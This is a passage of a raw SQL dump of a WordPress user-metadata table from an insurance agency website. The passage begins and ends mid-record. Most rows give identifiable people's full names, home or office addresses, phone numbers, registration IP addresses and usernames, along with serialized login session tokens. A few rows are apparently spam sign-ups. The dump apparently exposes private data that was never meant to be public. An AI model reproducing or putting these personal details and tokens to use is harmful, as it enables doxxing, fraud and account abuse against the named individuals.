59'),(3889,130,'addr2',''),(3892,130,'city','Brooklyn'),(3895,130,'thestate','NY'),(3898,130,'zip','11219'),(3901,130,'country','USA'),(3904,130,'phone1','718-633-0544'),(3907,130,'wpmem_reg_ip','198.167.168.70'),(3910,130,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(3913,130,'tos',''),(3916,130,'bgusername','Jschwinder'),(3919,130,'active','1'),(3921,132,'nickname','roisy'),(3924,132,'first_name','roisy'),(3927,132,'last_name','braver'),(3930,132,'description',''),(3933,132,'rich_editing','true'),(3936,132,'comment_shortcuts','false'),(3939,132,'admin_color','fresh'),(3942,132,'use_ssl','0'),(3945,132,'show_admin_bar_front','true'),(3948,132,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3951,132,'wp_user_level','0'),(3954,132,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3957,132,'addr1','162 south 8th'),(3960,132,'addr2',''),(3963,132,'city','brooklyn'),(3966,132,'thestate','ny'),(3969,132,'zip','11211'),(3972,132,'country','ny'),(3975,132,'phone1','7182189647'),(3978,132,'wpmem_reg_ip','108.58.88.178'),(3981,132,'wpmem_reg_url','http://www.empireins.com/insentives/'),(3982,132,'tos',''),(3985,132,'bgusername','roisy'),(3988,132,'active','1'),(3990,132,'session_tokens','a:3:{s:64:\"34b36a750df1d4f72fb54bd7bf467dc57d07eeb4ee525109b4e1848bc7dfb187\";a:4:{s:10:\"expiration\";i:1463064492;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462891692;}s:64:\"c69887b166fc451637e58a04540daede9e870c0b938c57fafa0d16f260dfdf79\";a:4:{s:10:\"expiration\";i:1463159727;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462986927;}s:64:\"7981963a220c179ff7281d9ef889e54f51b6f50c006c9dcaacc437ce868c45a0\";a:4:{s:10:\"expiration\";i:1463232014;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1463059214;}}'),(3991,133,'nickname','wlandau'),(3994,133,'first_name','Wolf'),(3997,133,'last_name','Landau'),(4000,133,'description',''),(4003,133,'rich_editing','true'),(4006,133,'comment_shortcuts','false'),(4009,133,'admin_color','fresh'),(4012,133,'use_ssl','0'),(4015,133,'show_admin_bar_front','true'),(4018,133,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4021,133,'wp_user_level','0'),(4024,133,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4027,133,'addr1','80 Skillman St #4-F'),(4030,133,'addr2',''),(4033,133,'city','Brooklyn'),(4036,133,'thestate','NY'),(4039,133,'zip','11205'),(4042,133,'country','USA'),(4045,133,'phone1','718-486-4622'),(4048,133,'wpmem_reg_ip','209.64.152.62'),(4051,133,'wpmem_reg_url','http://www.empireins.com/members/'),(4054,133,'tos',''),(4057,133,'bgusername','wlandau'),(4060,133,'active','1'),(4062,133,'session_tokens','a:5:{s:64:\"6bf1a33e10f742623238c8140ddc0f65b7d62d9fdf5c7c135daf3b6044ca270e\";a:4:{s:10:\"expiration\";i:1454980728;s:2:\"ip\";s:13:\"209.64.152.62\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1453771128;}s:64:\"13c6871839a3a1ed11fe4cb0765679665d89a7590c4dc616c1b837d93207911b\";a:4:{s:10:\"expiration\";i:1454980744;s:2:\"ip\";s:13:\"209.64.152.62\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1453771144;}s:64:\"ac1a570fe8f30f5315fee4023d1a70467cb4280139d1fd1c7c2c3618b31a791d\";a:4:{s:10:\"expiration\";i:1454981371;s:2:\"ip\";s:13:\"209.64.152.62\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1453771771;}s:64:\"b2c876f58043be36ad7b0b6378acf0cd16907f3a3f387bab06db41ba8ce74eb4\";a:4:{s:10:\"expiration\";i:1454981612;s:2:\"ip\";s:13:\"209.64.152.62\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\";s:5:\"login\";i:1453772012;}s:64:\"47b37a9d55e34d364e1f48fadc9919855a42696cb1a91e02e8a065b2388b2333\";a:4:{s:10:\"expiration\";i:1454981946;s:2:\"ip\";s:13:\"209.64.152.62\";s:2:\"ua\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\";s:5:\"login\";i:1453772346;}}'),(4064,134,'nickname','shlomobass'),(4067,134,'first_name','Salim'),(4070,134,'last_name','Bassalian'),(4073,134,'description',''),(4076,134,'rich_editing','true'),(4079,134,'comment_shortcuts','false'),(4082,134,'admin_color','fresh'),(4085,134,'use_ssl','0'),(4088,134,'show_admin_bar_front','true'),(4091,134,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4094,134,'wp_user_level','0'),(4097,134,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4100,134,'addr1','1A Floyd Place'),(4103,134,'addr2',''),(4106,134,'city','Great Neck'),(4109,134,'thestate','NY'),(4112,134,'zip','11024'),(4115,134,'country','USA'),(4118,134,'phone1','516-499-9900'),(4121,134,'wpmem_reg_ip','67.80.177.103'),(4124,134,'wpmem_reg_url','http://www.empireins.com/register/'),(4125,134,'tos',''),(4128,134,'bgusername','shlomobass'),(4131,134,'active','1'),(4133,134,'session_tokens','a:1:{s:64:\"c6b59a3362b020c9b895c97345e8bbe4377da2ecc45526e965e0e392329f2cf3\";a:4:{s:10:\"expiration\";i:1455126391;s:2:\"ip\";s:13:\"67.80.177.103\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1453916791;}}'),(4137,135,'nickname','PQjSypMRYewznoRCuU'),(4140,135,'first_name','Mark'),(4143,135,'last_name','XSizJaVOcfQpoJR'),(4146,135,'description',''),(4149,135,'rich_editing','true'),(4152,135,'comment_shortcuts','false'),(4155,135,'admin_color','fresh'),(4158,135,'use_ssl','0'),(4161,135,'show_admin_bar_front','true'),(4164,135,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4167,135,'wp_user_level','0'),(4170,135,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4173,135,'addr1','GrBDntzjoSgq'),(4176,135,'addr2','ioPkKtCKejYWu'),(4179,135,'city','New York'),(4182,135,'thestate','NY'),(4185,135,'zip','98245'),(4188,135,'country','USA'),(4191,135,'phone1','86806297543'),(4194,135,'wpmem_reg_ip','188.143.232.14'),(4197,135,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(4199,137,'nickname','ykaufman'),(4202,137,'first_name','yoel'),(4205,137,'last_name','kaufman'),(4208,137,'description',''),(4211,137,'rich_editing','true'),(4214,137,'comment_shortcuts','false'),(4217,137,'admin_color','fresh'),(4220,137,'use_ssl','0'),(4223,137,'show_admin_bar_front','true'),(4226,137,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4229,137,'wp_user_level','0'),(4232,137,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4235,137,'addr1','1 teverya way unit 201'),(4238,137,'addr2',''),(4241,137,'city','monroe'),(4244,137,'thestate','ny'),(4247,137,'zip','10950'),(4250,137,'country','usa'),(4253,137,'phone1','8456622084'),(4256,137,'wpmem_reg_ip','50.108.130.167'),(4259,137,'wpmem_reg_url','http://www.empireins.com/register/'),(4260,137,'tos',''),(4263,137,'bgusername',''),(4266,137,'active','1'),(4268,137,'session_tokens','a:2:{s:64:\"8ef281a7d1f2b0030cd2d063ba7ea8fcbb7dbddcdcf004610888b352efb7c148\";a:4:{s:10:\"expiration\";i:1462573319;s:2:\"ip\";s:14:\"50.108.153.152\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462400519;}s:64:\"c92752d055fa907f84371d4503653b805657705b3c0942e9ee3f24786bfb93e6\";a:4:{s:10:\"expiration\";i:1463615422;s:2:\"ip\";s:14:\"50.108.153.152\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462405822;}}'),(4269,138,'nickname','engelsruly'),(4272,138,'first_name','Elie'),(4275,138,'last_name','Engel'),(4278,138,'description',''),(4281,138,'rich_editing','true'),(4284,138,'comment_shortcuts','false'),(4287,138,'admin_color','fresh'),(4290,138,'use_ssl','0'),(4293,138,'show_admin_bar_front','true'),(4296,138,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4299,138,'wp_user_level','0'),(4302,138,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4305,138,'addr1','6 Melnick Dr.'),(4308,138,'addr2','Ste 110'),(4311,138,'city','Monsey'),(4314,138,'thestate','New York'),(4317,138,'zip','10952'),(4320,138,'country','United States'),(4323,138,'phone1','8454228080'),(4326,138,'wpmem_reg_ip','108.21.243.221'),(4329,138,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(4331,138,'tos',''),(4334,138,'bgusername','engelsruly'),(4337,138,'active','1'),(4338,138,'session_tokens','a:1:{s:64:\"75d74aced09e992f474fad22ead1bafa01a59eff93d2ab50b800d221967e2b6a\";a:4:{s:10:\"expiration\";i:1457388512;s:2:\"ip\";s:14:\"108.21.243.221\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1456178912;}}'),(4340,140,'nickname','freundjoel'),(4343,140,'first_name','joel'),(4346,140,'last_name','freund'),(4349,140,'description',''),(4352,140,'rich_editing','true'),(4355,140,'comment_shortcuts','false'),(4358,140,'admin_color','fresh'),(4361,140,'use_ssl','0'),(4364,140,'show_admin_bar_front','true'),(4367,140,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4370,140,'wp_user_level','0'),(4373,140,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4376,140,'addr1','134 Broadway #410'),(4379,140,'addr2',''),(4382,140,'city','brooklyn'),(4385,140,'thestate','ny'),(4388,140,'zip','11249'),(4391,140,'country','usa'),(4394,140,'phone1','7188126374'),(4397,140,'wpmem_reg_ip','24.213.178.195'),(4400,140,'wpmem_reg_url','http://www.empireins.com/register/'),(4401,140,'tos',''),(4404,140,'bgusername','freundjoel'),(4407,140,'active','1'),(4410,140,'session_tokens','a:1:{s:64:\"3bbf893f045235e2872ec6fa104b5919c42256b679ce4199a1fa8190a223c976\";a:4:{s:10:\"expiration\";i:1455562163;s:2:\"ip\";s:14:\"24.213.178.195\";s:2:\"ua\";s:75:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\";s:5:\"login\";i:1454352563;}}'),(4413,141,'nickname','hershele'),(4416,141,'first_name','Lazar H.'),(4419,141,'last_name','Brody'),(4422,141,'description',''),(4425,141,'rich_editing','true'),(4428,141,'comment_shortcuts','false'),(4431,141,'admin_color','fresh'),(4434,141,'use_ssl','0'),(4437,141,'show_admin_bar_front','true'),(4440,141,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4443,141,'wp_user_level','0'),(4446,141,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4449,141,'addr1','lazarbrody@gmail.com'),(4452,141,'addr2',''),(4455,141,'city','Monsey'),(4458,141,'thestate','NY - New York'),(4461,141,'zip','10952'),(4464,141,'country','USA'),(4467,141,'phone1','8455781507'),(4470,141,'wpmem_reg_ip','108.21.243.8'),(4473,141,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(4475,143,'nickname','Sgrunstein'),(4478,143,'first_name','Shimshon'),(4481,143,'last_name','Grunstein'),(4484,143,'description',''),(4487,143,'rich_editing','true'),(4490,143,'comment_shortcuts','false'),(4493,143,'admin_color','fresh'),(4496,143,'use_ssl','0'),(4499,143,'show_admin_bar_front','true'),(4502,143,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4505,143,'wp_user_level','0'),(4508,143,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4511,143,'addr1','3916 New Utrecht Ave'),(4514,143,'addr2','Apt 1'),(4517,143,'city','Brooklyn'),(4520,143,'thestate','NY'),(4523,143,'zip','11219'),(4526,143,'country','United States'),(4529,143,'phone1','7186331850'),(4532,143,'wpmem_reg_ip','47.17.234.126'),(4535,143,'wpmem_reg_url','http://www.empireins.com/register/'),(4538,143,'tos',''),(4541,143,'bgusername','Sgrunstein'),(4544,143,'active','1'),(4545,141,'tos',''),(4548,141,'bgusername',''),(4551,141,'active','1'),(4553,141,'session_tokens','a:1:{s:64:\"2e03bae5dc026df3271ff0ce3b3a3e81386d433cc7bd0dc225c51d29d0ba29d2\";a:4:{s:10:\"expiration\";i:1458694182;s:2:\"ip\";s:12:\"173.56.252.3\";s:2:\"ua\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36\";s:5:\"login\";i:1458521382;}}'),(4554,144,'nickname','lweinberger'),(4557,144,'first_name','Lazar'),(4560,144,'last_name','Weinberger'),(4563,144,'description',''),(4566,144,'rich_editing','true'),(4569,144,'comment_shortcuts','false'),(4572,144,'admin_color','fresh'),(4575,144,'use_ssl','0'),(4578,144,'show_admin_bar_front','true'),(4581,144,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4584,144,'wp_user_level','0'),(4587,144,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4590,144,'addr1','100 Skillman street'),(4593,144,'addr2',''),(4596,144,'city','Brooklyn'),(4599,144,'thestate','New York'),(4602,144,'zip','11205'),(4605,144,'country','United States'),(4608,144,'phone1','6462071532'),(4611,144,'wpmem_reg_ip','67.86.154.181'),(4614,144,'wpmem_reg_url','http://www.empireins.com/register/'),(4617,144,'tos',''),(4620,144,'bgusername','lweinberger'),(4623,144,'active','1'),(4626,143,'session_tokens','a:4:{s:64:\"ad60c86fb080b5866c6ec315bf5f3c733512a834620ec1bfd4f53d5db7bb6463\";a:4:{s:10:\"expiration\";i:1463085824;s:2:\"ip\";s:13:\"47.17.234.126\";s:2:\"ua\";s:76:\"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MALCJS; rv:11.0) like Gecko\";s:5:\"login\";i:1461876224;}s:64:\"040c8742e917c04d61c5be66e69852989e398f387e08590c57b132646f6acb7f\";a:4:{s:10:\"expiration\";i:1463085846;s:2:\"ip\";s:13:\"47.17.234.126\";s:2:\"ua\";s:76:\"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MALCJS; rv:11.0) like Gecko\";s:5:\"login\";i:1461876246;}s:64:\"381df02c9506481500ed69fddf5fae200d86a48a20819dbfdc75a234d5c51bed\";a:4:{s:10:\"expiration\";i:1463028835;s:2:\"ip\";s:13:\"47.17.234.126\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462856035;}s:64:\"e76106513f01c77f2e98291754852f4847e233f9f8ed6f5f57478c4d0b416c72\";a:4:{s:10:\"expiration\";i:1463104761;s:2:\"ip\";s:13:\"47.17.234.126\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462931961;}}'),(4627,145,'nickname','isaacjacob'),(4629,145,'first_name','jsaac'),(4631,145,'last_name','jacob'),(4633,145,'description',''),(4635,145,'rich_editing','true'),(4637,145,'comment_shortcuts','false'),(4639,145,'admin_color','fresh'),(4641,145,'use_ssl','0'),(4643,145,'show_admin_bar_front','true'),(4645,145,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4647,145,'wp_user_level','0'),(4649,145,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4651,145,'addr1','292 blauvelt rd'),(4653,145,'addr2',''),(4655,145,'city','monsey'),(4657,145,'thestate','ny'),(4659,145,'zip','10952'),(4661,145,'country','usa'),(4663,145,'phone1','8454256055'),(4665,145,'wpmem_reg_ip','24.189.137.248'),(4667,145,'wpmem_reg_url','http://www.empireins.com/members/'),(4670,145,'tos',''),(4673,145,'bgusername','isaacjacob'),(4676,145,'active','1'),(4679,145,'session_tokens','a:1:{s:64:\"def7be4d9ba1e7e14f1b6522e230babb10666964fc867d9f25659347bb94e359\";a:4:{s:10:\"expiration\";i:1462383861;s:2:\"ip\";s:12:\"67.83.100.17\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1462211061;}}'),(4680,147,'nickname','joel10950'),(4683,147,'first_name','Joel'),(4686,147,'last_name','Lebovits'),(4689,147,'description',''),(4692,147,'rich_editing','true'),(4695,147,'comment_shortcuts','false'),(4698,147,'admin_color','fresh'),(4701,147,'use_ssl','0'),(4704,147,'show_admin_bar_front','true'),(4707,147,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4710,147,'wp_user_level','0'),(4713,147,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4716,147,'addr1','2 Sasev Ct.'),(4719,147,'addr2','#102'),(4722,147,'city','Monroe'),(4725,147,'thestate','NY'),(4728,147,'zip','10950'),(4731,147,'country','US'),(4734,147,'phone1','845.537.0365'),(4737,147,'wpmem_reg_ip','75.99.148.62'),(4740,147,'wpmem_reg_url','http://www.empireins.com/members/'),(4742,147,'tos',''),(4745,147,'bgusername',''),(4748,147,'active','1'),(4751,147,'session_tokens','a:1:{s:64:\"298ab95e3e49e6c34bd95df1f45ab0cec9d4538454c6629e4fce3e0878203a45\";a:4:{s:10:\"expiration\";i:1460496708;s:2:\"ip\";s:12:\"75.99.148.62\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36\";s:5:\"login\";i:1459287108;}}'),(4752,144,'session_tokens','a:2:{s:64:\"b9532d18eeda5f8e2b88880b3c8a581c44b90b1fa06f595977eecbd41cb053af\";a:4:{s:10:\"expiration\";i:1462307162;s:2:\"ip\";s:13:\"67.86.154.190\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36\";s:5:\"login\";i:1462134362;}s:64:\"fca367eb1c8c818537cb28a3f1138f0146964751eb0f45108b8f8cae42712264\";a:4:{s:10:\"expiration\";i:1462307180;s:2:\"ip\";s:13:\"67.86.154.190\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36\";s:5:\"login\";i:1462134380;}}'),(4755,129,'session_tokens','a:2:{s:64:\"64f7ac21366a6f49ff034b68261deb3b70d1a7d30fe492d3a881226904c0848b\";a:4:{s:10:\"expiration\";i:1462989105;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36\";s:5:\"login\";i:1462816305;}s:64:\"3224b5d92431ae4d737dee0b984e68e3e5bc095097c04d0e9437663bf90906d0\";a:4:{s:10:\"expiration\";i:1463151365;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36\";s:5:\"login\";i:1462978565;}}'),(4758,150,'nickname','DonaldPync'),(4761,150,'first_name','DonaldPyncGK'),(4764,150,'last_name','DonaldPyncGK'),(4767,150,'description',''),(4770,150,'rich_editing','true'),(4773,150,'comment_shortcuts','false'),(4776,150,'admin_color','fresh'),(4779,150,'use_ssl','0'),(4782,150,'show_admin_bar_front','true'),(4785,150,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4788,150,'wp_user_level','0'),(4791,150,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4794,150,'addr1','Kuwait'),(4797,150,'addr2','Kuwait'),(4800,150,'city','Kuwait'),(4803,150,'thestate','Kuwait'),(4806,150,'zip','123456'),(4809,150,'country','Kuwait'),(4812,150,'phone1','123456'),(4815,150,'wpmem_reg_ip','112.111.165.173'),(4818,150,'wpmem_reg_url','http://www.empireins.com/register/'),(4821,153,'nickname','joseffried'),(4824,153,'first_name','josef'),(4827,153,'last_name','fried'),(4830,153,'description',''),(4833,153,'rich_editing','true'),(4836,153,'comment_shortcuts','false'),(4839,153,'admin_color','fresh'),(4842,153,'use_ssl','0'),(4845,153,'show_admin_bar_front','true'),(4848,153,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4851,153,'wp_user_level','0'),(4854,153,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4857,153,'addr1','664 Myrtle Avenue #3-L'),(4860,153,'addr2',''),(4863,153,'city','Brooklyn'),(4866,153,'thestate','NY'),(4869,153,'zip','11205'),(4872,153,'country','USA'),(4875,153,'phone1','9177413277'),(4878,153,'wpmem_reg_ip','104.246.54.244'),(4881,153,'wpmem_reg_url','http://www.empireins.com/register/'),(4883,153,'tos',''),(4886,153,'bgusername','joseffried'),(4889,153,'active','1'),(4893,76,'wp_user-settings','mfold=o'),(4896,76,'wp_user-settings-time','1454971108'),(4899,156,'nickname','zlberger'),(4902,156,'first_name','Zalmen'),(4905,156,'last_name','Berger'),(4908,156,'description',''),(4911,156,'rich_editing','true'),(4914,156,'comment_shortcuts','false'),(4917,156,'admin_color','fresh'),(4920,156,'use_ssl','0'),(4923,156,'show_admin_bar_front','true'),(4926,156,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(4929,156,'wp_user_level','0'),(4932,156,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(4935,156,'addr1','1222 Avenue M'),(4938,156,'addr2','Suite 305'),(4941,156,'city','Brooklyn'),(4944,156,'thestate','NY'),(4947,156,'zip','11230'),(4950,156,'country','USA'),(4953,156,'phone1','7187870123'),(4956,156,'wpmem_reg_ip','67.81.56.252'),(4959,156,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(4962,156,'tos',''),(4965,156,'bgusername','zlberger'),(4968,156,'active','1'),(4971,156,'session_tokens','a:1:{s:64:\"98138508cea04e35f9a370a71fa8fcfb8d63467fb16445d4a6c37c901179e3d2\";a:4:{s:10:\"expiration\";i:1463246638;s:2:\"ip\";s:13:\"74.90.212.216\";s:2:\"ua\";s:75:\"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko\";s:5:\"login\";i:1463073838;}}'),(4974,159,'nickname','Wperl'),(4977,159,'first_name','Wolf'),(4980,159,'last_name','Perl'),(4983,159,'description',''),(4986,159,'rich_editing','true'),(4989,159,'comment_shortcuts','false'),(4992,159,'admin_color','fresh'),(4995,159,'use_ssl','0'),(4998,159,'show_admin_bar_front','true'),(5001,159,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5004,159,'wp_user_level','0'),(5007,159,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5010,159,'addr1','134 Broadway'),(5013,159,'addr2',''),(5016,159,'city','Brooklyn'),(5019,159,'thestate','NY'),(5022,159,'zip','11249'),(5025,159,'country','USA'),(5028,159,'phone1','718-302-8620'),(5031,159,'wpmem_reg_ip','24.213.178.195'),(5034,159,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(5036,159,'tos',''),(5039,159,'bgusername','Wperl'),(5042,159,'active','1'),(5043,159,'session_tokens','a:3:{s:64:\"452fdc0d81cd7e065acae68cbb02cd9a1240260945ab133f3dd71eb60541c1ac\";a:4:{s:10:\"expiration\";i:1462983599;s:2:\"ip\";s:11:\"24.90.91.19\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462810799;}s:64:\"73558e689617836484d560b34c867b5e8c4cced60d64b5983584934a648a1f5f\";a:4:{s:10:\"expiration\";i:1462998102;s:2:\"ip\";s:11:\"24.90.91.19\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462825302;}s:64:\"9c8e90c433872b412b5ff54d1dbf187763095a31eb545b3708ba9f99aa03752e\";a:4:{s:10:\"expiration\";i:1463063538;s:2:\"ip\";s:11:\"24.90.91.19\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462890738;}}'),(5049,130,'session_tokens','a:2:{s:64:\"8e50356a1206dd9536256242af6eac9a55f9557455e4a698b8d3b1d83fde8c33\";a:4:{s:10:\"expiration\";i:1460484920;s:2:\"ip\";s:14:\"198.167.168.70\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1459275320;}s:64:\"d7a57b3586e75ea536740acd35b345054c627d04a486b98f494a4526b1d98b36\";a:4:{s:10:\"expiration\";i:1460654368;s:2:\"ip\";s:14:\"198.167.168.70\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1460481568;}}'),(5051,161,'nickname','WilliamPt'),(5054,161,'first_name','WilliamPtOY'),(5057,161,'last_name','WilliamPtOY'),(5060,161,'description',''),(5063,161,'rich_editing','true'),(5066,161,'comment_shortcuts','false'),(5069,161,'admin_color','fresh'),(5072,161,'use_ssl','0'),(5075,161,'show_admin_bar_front','true'),(5078,161,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5081,161,'wp_user_level','0'),(5084,161,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5087,161,'addr1','Mosta'),(5090,161,'addr2','Mosta'),(5093,161,'city','Mosta'),(5096,161,'thestate','Malta'),(5099,161,'zip','123456'),(5102,161,'country','Malta'),(5105,161,'phone1','123456'),(5108,161,'wpmem_reg_ip','112.111.165.173'),(5111,161,'wpmem_reg_url','http://www.empireins.com/register/'),(5114,164,'nickname','zenwirth'),(5117,164,'first_name','benzion'),(5120,164,'last_name','weinfeld'),(5123,164,'description',''),(5126,164,'rich_editing','true'),(5129,164,'comment_shortcuts','false'),(5132,164,'admin_color','fresh'),(5135,164,'use_ssl','0'),(5138,164,'show_admin_bar_front','true'),(5141,164,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5144,164,'wp_user_level','0'),(5147,164,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5150,164,'addr1','134 broadway'),(5153,164,'addr2',''),(5156,164,'city','brooklyn'),(5159,164,'thestate','ny'),(5162,164,'zip','11249'),(5165,164,'country','usa'),(5168,164,'phone1','7184272027'),(5171,164,'wpmem_reg_ip','69.164.140.246'),(5174,164,'wpmem_reg_url','http://www.empireins.com/register/'),(5177,164,'tos',''),(5180,164,'bgusername','zenwirth'),(5183,164,'active','1'),(5186,164,'session_tokens','a:2:{s:64:\"5dd304caa53296e8c67580af12c1c88537b18dbc4c8417db680dcf625fcb9af0\";a:4:{s:10:\"expiration\";i:1462485021;s:2:\"ip\";s:14:\"69.164.140.246\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462312221;}s:64:\"f52e480b711ce1f2446020f41688c0d8c09fd2867ff18811d77223560c77aa8a\";a:4:{s:10:\"expiration\";i:1463677998;s:2:\"ip\";s:14:\"69.164.140.246\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 